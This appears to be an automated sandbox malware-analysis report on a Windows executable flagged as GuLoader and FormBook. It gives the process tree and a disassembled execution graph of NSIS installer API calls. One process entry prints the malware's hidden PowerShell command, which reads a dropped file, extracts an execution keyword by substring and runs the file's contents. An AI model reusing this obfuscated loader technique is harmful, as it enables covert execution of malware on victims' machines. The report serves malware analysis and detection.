                                                                      General

                                                                      Target ID:0
                                                                      Start time:04:04:09
                                                                      Start date:28/11/2024
                                                                      Path:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Salmebogs(1).exe"
                                                                      Imagebase:0x400000
                                                                      File size:552'510 bytes
                                                                      MD5 hash:B5948D19A341BC22C750D129F41A55AE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:04:04:10
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
                                                                      Imagebase:0x220000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3459194862.000000000BAC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:04:04:10
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:04:06:07
                                                                      Start date:28/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
                                                                      Imagebase:0x400000
                                                                      File size:552'510 bytes
                                                                      MD5 hash:B5948D19A341BC22C750D129F41A55AE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3666544295.0000000003F01000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 21%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:04:06:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe"
                                                                      Imagebase:0x690000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:8
                                                                      Start time:04:06:23
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\svchost.exe"
                                                                      Imagebase:0xea0000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:04:06:36
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe"
                                                                      Imagebase:0x690000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:10
                                                                      Start time:04:06:48
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff728280000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:19.6%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:22%
                                                                        Total number of Nodes:1307
                                                                        Total number of Limit Nodes:27
                                                                        execution_graph 3654 402840 3655 402bbf 18 API calls 3654->3655 3657 40284e 3655->3657 3656 402864 3659 405bdd 2 API calls 3656->3659 3657->3656 3658 402bbf 18 API calls 3657->3658 3658->3656 3660 40286a 3659->3660 3682 405c02 GetFileAttributesW CreateFileW 3660->3682 3662 402877 3663 402883 GlobalAlloc 3662->3663 3664 40291a 3662->3664 3667 402911 CloseHandle 3663->3667 3668 40289c 3663->3668 3665 402922 DeleteFileW 3664->3665 3666 402935 3664->3666 3665->3666 3667->3664 3683 403235 SetFilePointer 3668->3683 3670 4028a2 3671 40321f ReadFile 3670->3671 3672 4028ab GlobalAlloc 3671->3672 3673 4028bb 3672->3673 3674 4028ef 3672->3674 3675 403027 32 API calls 3673->3675 3676 405cb4 WriteFile 3674->3676 3677 4028c8 3675->3677 3678 4028fb GlobalFree 3676->3678 3680 4028e6 GlobalFree 3677->3680 3679 403027 32 API calls 3678->3679 3681 40290e 3679->3681 3680->3674 3681->3667 3682->3662 3683->3670 3684 401cc0 3685 402ba2 18 API calls 3684->3685 3686 401cc7 3685->3686 3687 402ba2 18 API calls 3686->3687 3688 401ccf GetDlgItem 3687->3688 3689 402531 3688->3689 3690 4029c0 3691 402ba2 18 API calls 3690->3691 3692 4029c6 3691->3692 3693 4029f9 3692->3693 3694 40281e 3692->3694 3696 4029d4 3692->3696 3693->3694 3695 40604f 18 API calls 3693->3695 3695->3694 3696->3694 3698 405f74 wsprintfW 3696->3698 3698->3694 3699 401fc3 3700 401fd5 3699->3700 3701 402087 3699->3701 3702 402bbf 18 API calls 3700->3702 3704 401423 25 API calls 3701->3704 3703 401fdc 3702->3703 3705 402bbf 18 API calls 3703->3705 3710 4021e1 3704->3710 3706 401fe5 3705->3706 3707 401ffb LoadLibraryExW 3706->3707 3708 401fed GetModuleHandleW 3706->3708 3707->3701 3709 40200c 3707->3709 3708->3707 3708->3709 3719 406476 WideCharToMultiByte 3709->3719 3713 402056 3715 40518c 25 API calls 3713->3715 3714 40201d 3716 401423 25 API calls 3714->3716 3717 40202d 3714->3717 3715->3717 3716->3717 3717->3710 3718 402079 FreeLibrary 3717->3718 3718->3710 3720 4064a0 GetProcAddress 3719->3720 3721 402017 3719->3721 3720->3721 3721->3713 3721->3714 3722 4016c4 3723 402bbf 18 API calls 3722->3723 3724 4016ca GetFullPathNameW 3723->3724 3725 4016e4 3724->3725 3731 401706 3724->3731 3728 406370 2 API calls 3725->3728 3725->3731 3726 40171b GetShortPathNameW 3727 402a4c 3726->3727 3729 4016f6 3728->3729 3729->3731 3732 40602d lstrcpynW 3729->3732 3731->3726 3731->3727 3732->3731 3733 404545 3734 404555 3733->3734 3735 40457b 3733->3735 3736 4040f1 19 API calls 3734->3736 3737 404158 8 API calls 3735->3737 3738 404562 SetDlgItemTextW 3736->3738 3739 404587 3737->3739 3738->3735 3230 4052cb 3231 405475 3230->3231 3232 4052ec GetDlgItem GetDlgItem GetDlgItem 3230->3232 3234 4054a6 3231->3234 3235 40547e GetDlgItem CreateThread CloseHandle 3231->3235 3275 404126 SendMessageW 3232->3275 3236 4054f6 3234->3236 3237 4054bd ShowWindow ShowWindow 3234->3237 3239 4054d1 3234->3239 3235->3234 3278 40525f OleInitialize 3235->3278 3244 404158 8 API calls 3236->3244 3277 404126 SendMessageW 3237->3277 3238 405531 3238->3236 3248 40553f SendMessageW 3238->3248 3239->3238 3242 4054e5 3239->3242 3243 40550b ShowWindow 3239->3243 3240 40535c 3245 405363 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3240->3245 3249 4040ca SendMessageW 3242->3249 3251 40552b 3243->3251 3252 40551d 3243->3252 3250 405504 3244->3250 3246 4053d1 3245->3246 3247 4053b5 SendMessageW SendMessageW 3245->3247 3253 4053e4 3246->3253 3254 4053d6 SendMessageW 3246->3254 3247->3246 3248->3250 3255 405558 CreatePopupMenu 3248->3255 3249->3236 3257 4040ca SendMessageW 3251->3257 3256 40518c 25 API calls 3252->3256 3259 4040f1 19 API calls 3253->3259 3254->3253 3258 40604f 18 API calls 3255->3258 3256->3251 3257->3238 3260 405568 AppendMenuW 3258->3260 3261 4053f4 3259->3261 3262 405585 GetWindowRect 3260->3262 3263 405598 TrackPopupMenu 3260->3263 3264 405431 GetDlgItem SendMessageW 3261->3264 3265 4053fd ShowWindow 3261->3265 3262->3263 3263->3250 3266 4055b3 3263->3266 3264->3250 3269 405458 SendMessageW SendMessageW 3264->3269 3267 405420 3265->3267 3268 405413 ShowWindow 3265->3268 3270 4055cf SendMessageW 3266->3270 3276 404126 SendMessageW 3267->3276 3268->3267 3269->3250 3270->3270 3271 4055ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3270->3271 3273 405611 SendMessageW 3271->3273 3273->3273 3274 40563a GlobalUnlock SetClipboardData CloseClipboard 3273->3274 3274->3250 3275->3240 3276->3264 3277->3239 3279 40413d SendMessageW 3278->3279 3283 405282 3279->3283 3280 4052a9 3281 40413d SendMessageW 3280->3281 3282 4052bb CoUninitialize 3281->3282 3283->3280 3284 401389 2 API calls 3283->3284 3284->3283 3740 4014cb 3741 40518c 25 API calls 3740->3741 3742 4014d2 3741->3742 3743 40194e 3744 402bbf 18 API calls 3743->3744 3745 401955 lstrlenW 3744->3745 3746 402531 3745->3746 3747 4027ce 3748 4027d6 3747->3748 3749 4027da FindNextFileW 3748->3749 3752 4027ec 3748->3752 3750 402833 3749->3750 3749->3752 3753 40602d lstrcpynW 3750->3753 3753->3752 3754 401754 3755 402bbf 18 API calls 3754->3755 3756 40175b 3755->3756 3757 405c31 2 API calls 3756->3757 3758 401762 3757->3758 3758->3758 3759 401d56 GetDC GetDeviceCaps 3760 402ba2 18 API calls 3759->3760 3761 401d74 MulDiv ReleaseDC 3760->3761 3762 402ba2 18 API calls 3761->3762 3763 401d93 3762->3763 3764 40604f 18 API calls 3763->3764 3765 401dcc CreateFontIndirectW 3764->3765 3766 402531 3765->3766 3767 401a57 3768 402ba2 18 API calls 3767->3768 3769 401a5d 3768->3769 3770 402ba2 18 API calls 3769->3770 3771 401a05 3770->3771 3772 4014d7 3773 402ba2 18 API calls 3772->3773 3774 4014dd Sleep 3773->3774 3776 402a4c 3774->3776 3777 40155b 3778 4029f2 3777->3778 3781 405f74 wsprintfW 3778->3781 3780 4029f7 3781->3780 3782 401ddc 3783 402ba2 18 API calls 3782->3783 3784 401de2 3783->3784 3785 402ba2 18 API calls 3784->3785 3786 401deb 3785->3786 3787 401df2 ShowWindow 3786->3787 3788 401dfd EnableWindow 3786->3788 3789 402a4c 3787->3789 3788->3789 3790 401bdf 3791 402ba2 18 API calls 3790->3791 3792 401be6 3791->3792 3793 402ba2 18 API calls 3792->3793 3794 401bf0 3793->3794 3795 401c00 3794->3795 3796 402bbf 18 API calls 3794->3796 3797 401c10 3795->3797 3800 402bbf 18 API calls 3795->3800 3796->3795 3798 401c1b 3797->3798 3799 401c5f 3797->3799 3801 402ba2 18 API calls 3798->3801 3802 402bbf 18 API calls 3799->3802 3800->3797 3803 401c20 3801->3803 3804 401c64 3802->3804 3805 402ba2 18 API calls 3803->3805 3806 402bbf 18 API calls 3804->3806 3807 401c29 3805->3807 3808 401c6d FindWindowExW 3806->3808 3809 401c31 SendMessageTimeoutW 3807->3809 3810 401c4f SendMessageW 3807->3810 3811 401c8f 3808->3811 3809->3811 3810->3811 3812 4022df 3813 402bbf 18 API calls 3812->3813 3814 4022ee 3813->3814 3815 402bbf 18 API calls 3814->3815 3816 4022f7 3815->3816 3817 402bbf 18 API calls 3816->3817 3818 402301 GetPrivateProfileStringW 3817->3818 3819 401960 3820 402ba2 18 API calls 3819->3820 3821 401967 3820->3821 3822 402ba2 18 API calls 3821->3822 3823 401971 3822->3823 3824 402bbf 18 API calls 3823->3824 3825 40197a 3824->3825 3826 40198e lstrlenW 3825->3826 3827 4019ca 3825->3827 3828 401998 3826->3828 3828->3827 3832 40602d lstrcpynW 3828->3832 3830 4019b3 3830->3827 3831 4019c0 lstrlenW 3830->3831 3831->3827 3832->3830 3833 401662 3834 402bbf 18 API calls 3833->3834 3835 401668 3834->3835 3836 406370 2 API calls 3835->3836 3837 40166e 3836->3837 3838 4048e2 3839 4048f2 3838->3839 3840 40490e 3838->3840 3849 405756 GetDlgItemTextW 3839->3849 3842 404941 3840->3842 3843 404914 SHGetPathFromIDListW 3840->3843 3845 40492b SendMessageW 3843->3845 3846 404924 3843->3846 3844 4048ff SendMessageW 3844->3840 3845->3842 3847 40140b 2 API calls 3846->3847 3847->3845 3849->3844 3850 4019e4 3851 402bbf 18 API calls 3850->3851 3852 4019eb 3851->3852 3853 402bbf 18 API calls 3852->3853 3854 4019f4 3853->3854 3855 4019fb lstrcmpiW 3854->3855 3856 401a0d lstrcmpW 3854->3856 3857 401a01 3855->3857 3856->3857 3858 4025e5 3859 402ba2 18 API calls 3858->3859 3860 4025f4 3859->3860 3861 40263a ReadFile 3860->3861 3862 405c85 ReadFile 3860->3862 3863 40267a MultiByteToWideChar 3860->3863 3864 40272f 3860->3864 3867 4026a0 SetFilePointer MultiByteToWideChar 3860->3867 3868 402740 3860->3868 3870 40272d 3860->3870 3871 405ce3 SetFilePointer 3860->3871 3861->3860 3861->3870 3862->3860 3863->3860 3880 405f74 wsprintfW 3864->3880 3867->3860 3869 402761 SetFilePointer 3868->3869 3868->3870 3869->3870 3872 405cff 3871->3872 3877 405d1b 3871->3877 3873 405c85 ReadFile 3872->3873 3874 405d0b 3873->3874 3875 405d24 SetFilePointer 3874->3875 3876 405d4c SetFilePointer 3874->3876 3874->3877 3875->3876 3878 405d2f 3875->3878 3876->3877 3877->3860 3879 405cb4 WriteFile 3878->3879 3879->3877 3880->3870 2913 401e66 2931 402bbf 2913->2931 2920 401edb CloseHandle 2924 40281e 2920->2924 2921 401e8c WaitForSingleObject 2922 401e9e 2921->2922 2923 401eb0 GetExitCodeProcess 2922->2923 2951 406443 2922->2951 2926 401ec2 2923->2926 2927 401ecf 2923->2927 2955 405f74 wsprintfW 2926->2955 2927->2920 2928 401ecd 2927->2928 2928->2920 2932 402bcb 2931->2932 2956 40604f 2932->2956 2935 401e6c 2937 40518c 2935->2937 2938 4051a7 2937->2938 2947 401e76 2937->2947 2939 4051c3 lstrlenW 2938->2939 2940 40604f 18 API calls 2938->2940 2941 4051d1 lstrlenW 2939->2941 2942 4051ec 2939->2942 2940->2939 2945 4051e3 lstrcatW 2941->2945 2941->2947 2943 4051f2 SetWindowTextW 2942->2943 2944 4051ff 2942->2944 2943->2944 2946 405205 SendMessageW SendMessageW SendMessageW 2944->2946 2944->2947 2945->2942 2946->2947 2948 40570d CreateProcessW 2947->2948 2949 405740 CloseHandle 2948->2949 2950 401e7c 2948->2950 2949->2950 2950->2920 2950->2921 2950->2924 2952 406460 PeekMessageW 2951->2952 2953 401ea5 WaitForSingleObject 2952->2953 2954 406456 DispatchMessageW 2952->2954 2953->2922 2954->2952 2955->2928 2961 40605c 2956->2961 2957 4062a7 2958 402bec 2957->2958 2990 40602d lstrcpynW 2957->2990 2958->2935 2974 4062c1 2958->2974 2960 40610f GetVersion 2960->2961 2961->2957 2961->2960 2962 406275 lstrlenW 2961->2962 2965 40604f 10 API calls 2961->2965 2967 40618a GetSystemDirectoryW 2961->2967 2968 40619d GetWindowsDirectoryW 2961->2968 2969 4062c1 5 API calls 2961->2969 2970 4061d1 SHGetSpecialFolderLocation 2961->2970 2971 40604f 10 API calls 2961->2971 2972 406216 lstrcatW 2961->2972 2983 405efa RegOpenKeyExW 2961->2983 2988 405f74 wsprintfW 2961->2988 2989 40602d lstrcpynW 2961->2989 2962->2961 2965->2962 2967->2961 2968->2961 2969->2961 2970->2961 2973 4061e9 SHGetPathFromIDListW CoTaskMemFree 2970->2973 2971->2961 2972->2961 2973->2961 2980 4062ce 2974->2980 2975 406349 CharPrevW 2978 406344 2975->2978 2976 406337 CharNextW 2976->2978 2976->2980 2978->2975 2979 40636a 2978->2979 2979->2935 2980->2976 2980->2978 2981 406323 CharNextW 2980->2981 2982 406332 CharNextW 2980->2982 2991 405a0e 2980->2991 2981->2980 2982->2976 2984 405f6e 2983->2984 2985 405f2e RegQueryValueExW 2983->2985 2984->2961 2986 405f4f RegCloseKey 2985->2986 2986->2984 2988->2961 2989->2961 2990->2958 2992 405a14 2991->2992 2993 405a2a 2992->2993 2994 405a1b CharNextW 2992->2994 2993->2980 2994->2992 2995 401767 2996 402bbf 18 API calls 2995->2996 2997 40176e 2996->2997 2998 401796 2997->2998 2999 40178e 2997->2999 3058 40602d lstrcpynW 2998->3058 3057 40602d lstrcpynW 2999->3057 3002 401794 3005 4062c1 5 API calls 3002->3005 3003 4017a1 3059 4059e1 lstrlenW CharPrevW 3003->3059 3011 4017b3 3005->3011 3010 4017c5 CompareFileTime 3010->3011 3011->3010 3012 401885 3011->3012 3014 40602d lstrcpynW 3011->3014 3021 40604f 18 API calls 3011->3021 3032 40185c 3011->3032 3033 405bdd GetFileAttributesW 3011->3033 3036 405c02 GetFileAttributesW CreateFileW 3011->3036 3062 406370 FindFirstFileW 3011->3062 3065 405772 3011->3065 3013 40518c 25 API calls 3012->3013 3015 40188f 3013->3015 3014->3011 3037 403027 3015->3037 3016 40518c 25 API calls 3020 401871 3016->3020 3019 4018b6 SetFileTime 3022 4018c8 CloseHandle 3019->3022 3021->3011 3022->3020 3023 4018d9 3022->3023 3024 4018f1 3023->3024 3025 4018de 3023->3025 3027 40604f 18 API calls 3024->3027 3026 40604f 18 API calls 3025->3026 3030 4018e6 lstrcatW 3026->3030 3028 4018f9 3027->3028 3031 405772 MessageBoxIndirectW 3028->3031 3030->3028 3031->3020 3032->3016 3032->3020 3034 405bfc 3033->3034 3035 405bef SetFileAttributesW 3033->3035 3034->3011 3035->3034 3036->3011 3038 403040 3037->3038 3039 40306e 3038->3039 3074 403235 SetFilePointer 3038->3074 3069 40321f 3039->3069 3043 4031b8 3045 4031fa 3043->3045 3050 4031bc 3043->3050 3044 40308b GetTickCount 3046 4018a2 3044->3046 3053 4030b7 3044->3053 3047 40321f ReadFile 3045->3047 3046->3019 3046->3022 3047->3046 3048 40321f ReadFile 3048->3053 3049 40321f ReadFile 3049->3050 3050->3046 3050->3049 3051 405cb4 WriteFile 3050->3051 3051->3050 3052 40310d GetTickCount 3052->3053 3053->3046 3053->3048 3053->3052 3054 403132 MulDiv wsprintfW 3053->3054 3072 405cb4 WriteFile 3053->3072 3055 40518c 25 API calls 3054->3055 3055->3053 3057->3002 3058->3003 3060 4017a7 lstrcatW 3059->3060 3061 4059fd lstrcatW 3059->3061 3060->3002 3061->3060 3063 406391 3062->3063 3064 406386 FindClose 3062->3064 3063->3011 3064->3063 3066 405787 3065->3066 3067 40579b MessageBoxIndirectW 3066->3067 3068 4057d3 3066->3068 3067->3068 3068->3011 3075 405c85 ReadFile 3069->3075 3073 405cd2 3072->3073 3073->3053 3074->3039 3076 403079 3075->3076 3076->3043 3076->3044 3076->3046 3881 401ee9 3882 402bbf 18 API calls 3881->3882 3883 401ef0 3882->3883 3884 406370 2 API calls 3883->3884 3885 401ef6 3884->3885 3887 401f07 3885->3887 3888 405f74 wsprintfW 3885->3888 3888->3887 3889 4021ea 3890 402bbf 18 API calls 3889->3890 3891 4021f0 3890->3891 3892 402bbf 18 API calls 3891->3892 3893 4021f9 3892->3893 3894 402bbf 18 API calls 3893->3894 3895 402202 3894->3895 3896 406370 2 API calls 3895->3896 3897 40220b 3896->3897 3898 40221c lstrlenW lstrlenW 3897->3898 3902 40220f 3897->3902 3900 40518c 25 API calls 3898->3900 3899 40518c 25 API calls 3903 402217 3899->3903 3901 40225a SHFileOperationW 3900->3901 3901->3902 3901->3903 3902->3899 3902->3903 3904 40156b 3905 401584 3904->3905 3906 40157b ShowWindow 3904->3906 3907 401592 ShowWindow 3905->3907 3908 402a4c 3905->3908 3906->3905 3907->3908 3909 40226e 3910 402275 3909->3910 3913 402288 3909->3913 3911 40604f 18 API calls 3910->3911 3912 402282 3911->3912 3914 405772 MessageBoxIndirectW 3912->3914 3914->3913 3915 4014f1 SetForegroundWindow 3916 402a4c 3915->3916 3917 401673 3918 402bbf 18 API calls 3917->3918 3919 40167a 3918->3919 3920 402bbf 18 API calls 3919->3920 3921 401683 3920->3921 3922 402bbf 18 API calls 3921->3922 3923 40168c MoveFileW 3922->3923 3924 401698 3923->3924 3925 40169f 3923->3925 3926 401423 25 API calls 3924->3926 3927 406370 2 API calls 3925->3927 3929 4021e1 3925->3929 3926->3929 3928 4016ae 3927->3928 3928->3929 3930 405ece 38 API calls 3928->3930 3930->3924 3931 401cfa GetDlgItem GetClientRect 3932 402bbf 18 API calls 3931->3932 3933 401d2c LoadImageW SendMessageW 3932->3933 3934 401d4a DeleteObject 3933->3934 3935 402a4c 3933->3935 3934->3935 3285 4027fb 3286 402bbf 18 API calls 3285->3286 3287 402802 FindFirstFileW 3286->3287 3288 40282a 3287->3288 3292 402815 3287->3292 3289 402833 3288->3289 3293 405f74 wsprintfW 3288->3293 3294 40602d lstrcpynW 3289->3294 3293->3289 3294->3292 3295 40237b 3296 402381 3295->3296 3297 402bbf 18 API calls 3296->3297 3298 402393 3297->3298 3299 402bbf 18 API calls 3298->3299 3300 40239d RegCreateKeyExW 3299->3300 3301 4023c7 3300->3301 3302 402a4c 3300->3302 3303 4023e2 3301->3303 3305 402bbf 18 API calls 3301->3305 3304 4023ee 3303->3304 3312 402ba2 3303->3312 3308 402409 RegSetValueExW 3304->3308 3309 403027 32 API calls 3304->3309 3306 4023d8 lstrlenW 3305->3306 3306->3303 3310 40241f RegCloseKey 3308->3310 3309->3308 3310->3302 3313 40604f 18 API calls 3312->3313 3314 402bb6 3313->3314 3314->3304 3319 40327d SetErrorMode GetVersion 3320 4032b2 3319->3320 3321 4032b8 3319->3321 3322 406407 5 API calls 3320->3322 3323 406397 3 API calls 3321->3323 3322->3321 3324 4032ce lstrlenA 3323->3324 3324->3321 3325 4032de 3324->3325 3326 406407 5 API calls 3325->3326 3327 4032e6 3326->3327 3328 406407 5 API calls 3327->3328 3329 4032ed #17 OleInitialize SHGetFileInfoW 3328->3329 3407 40602d lstrcpynW 3329->3407 3331 40332a GetCommandLineW 3408 40602d lstrcpynW 3331->3408 3333 40333c GetModuleHandleW 3334 403354 3333->3334 3335 405a0e CharNextW 3334->3335 3336 403363 CharNextW 3335->3336 3337 40348d GetTempPathW 3336->3337 3346 40337c 3336->3346 3409 40324c 3337->3409 3339 4034a5 3340 4034a9 GetWindowsDirectoryW lstrcatW 3339->3340 3341 4034ff DeleteFileW 3339->3341 3342 40324c 12 API calls 3340->3342 3419 402dee GetTickCount GetModuleFileNameW 3341->3419 3345 4034c5 3342->3345 3343 405a0e CharNextW 3343->3346 3345->3341 3348 4034c9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3345->3348 3346->3343 3351 403478 3346->3351 3353 403476 3346->3353 3347 403513 3349 4035c6 3347->3349 3354 4035b6 3347->3354 3356 405a0e CharNextW 3347->3356 3352 40324c 12 API calls 3348->3352 3520 40379c 3349->3520 3503 40602d lstrcpynW 3351->3503 3359 4034f7 3352->3359 3353->3337 3447 403876 3354->3447 3371 403532 3356->3371 3359->3341 3359->3349 3360 403700 3363 403784 ExitProcess 3360->3363 3364 403708 GetCurrentProcess OpenProcessToken 3360->3364 3361 4035e0 3362 405772 MessageBoxIndirectW 3361->3362 3368 4035ee ExitProcess 3362->3368 3369 403720 LookupPrivilegeValueW AdjustTokenPrivileges 3364->3369 3370 403754 3364->3370 3366 403590 3504 405ae9 3366->3504 3367 4035f6 3373 4056f5 5 API calls 3367->3373 3369->3370 3374 406407 5 API calls 3370->3374 3371->3366 3371->3367 3376 4035fb lstrcatW 3373->3376 3377 40375b 3374->3377 3379 403617 lstrcatW lstrcmpiW 3376->3379 3380 40360c lstrcatW 3376->3380 3378 403770 ExitWindowsEx 3377->3378 3381 40377d 3377->3381 3378->3363 3378->3381 3379->3349 3383 403633 3379->3383 3380->3379 3384 40140b 2 API calls 3381->3384 3386 403638 3383->3386 3387 40363f 3383->3387 3384->3363 3385 4035ab 3519 40602d lstrcpynW 3385->3519 3388 40565b 4 API calls 3386->3388 3389 4056d8 2 API calls 3387->3389 3391 40363d 3388->3391 3392 403644 SetCurrentDirectoryW 3389->3392 3391->3392 3393 403654 3392->3393 3394 40365f 3392->3394 3527 40602d lstrcpynW 3393->3527 3528 40602d lstrcpynW 3394->3528 3397 40604f 18 API calls 3398 40369e DeleteFileW 3397->3398 3399 4036ab CopyFileW 3398->3399 3404 40366d 3398->3404 3399->3404 3400 4036f4 3401 405ece 38 API calls 3400->3401 3401->3349 3403 40604f 18 API calls 3403->3404 3404->3397 3404->3400 3404->3403 3405 40570d 2 API calls 3404->3405 3406 4036df CloseHandle 3404->3406 3529 405ece MoveFileExW 3404->3529 3405->3404 3406->3404 3407->3331 3408->3333 3410 4062c1 5 API calls 3409->3410 3412 403258 3410->3412 3411 403262 3411->3339 3412->3411 3413 4059e1 3 API calls 3412->3413 3414 40326a 3413->3414 3415 4056d8 2 API calls 3414->3415 3416 403270 3415->3416 3533 405c31 3416->3533 3537 405c02 GetFileAttributesW CreateFileW 3419->3537 3421 402e2e 3440 402e3e 3421->3440 3538 40602d lstrcpynW 3421->3538 3423 402e54 3539 405a2d lstrlenW 3423->3539 3427 402e65 GetFileSize 3428 402f61 3427->3428 3446 402e7c 3427->3446 3544 402d8a 3428->3544 3430 402f6a 3432 402f9a GlobalAlloc 3430->3432 3430->3440 3556 403235 SetFilePointer 3430->3556 3431 40321f ReadFile 3431->3446 3555 403235 SetFilePointer 3432->3555 3433 402fcd 3437 402d8a 6 API calls 3433->3437 3436 402fb5 3439 403027 32 API calls 3436->3439 3437->3440 3438 402f83 3441 40321f ReadFile 3438->3441 3444 402fc1 3439->3444 3440->3347 3443 402f8e 3441->3443 3442 402d8a 6 API calls 3442->3446 3443->3432 3443->3440 3444->3440 3444->3444 3445 402ffe SetFilePointer 3444->3445 3445->3440 3446->3428 3446->3431 3446->3433 3446->3440 3446->3442 3448 406407 5 API calls 3447->3448 3449 40388a 3448->3449 3450 403890 3449->3450 3451 4038a2 3449->3451 3566 405f74 wsprintfW 3450->3566 3452 405efa 3 API calls 3451->3452 3453 4038d2 3452->3453 3454 4038f1 lstrcatW 3453->3454 3456 405efa 3 API calls 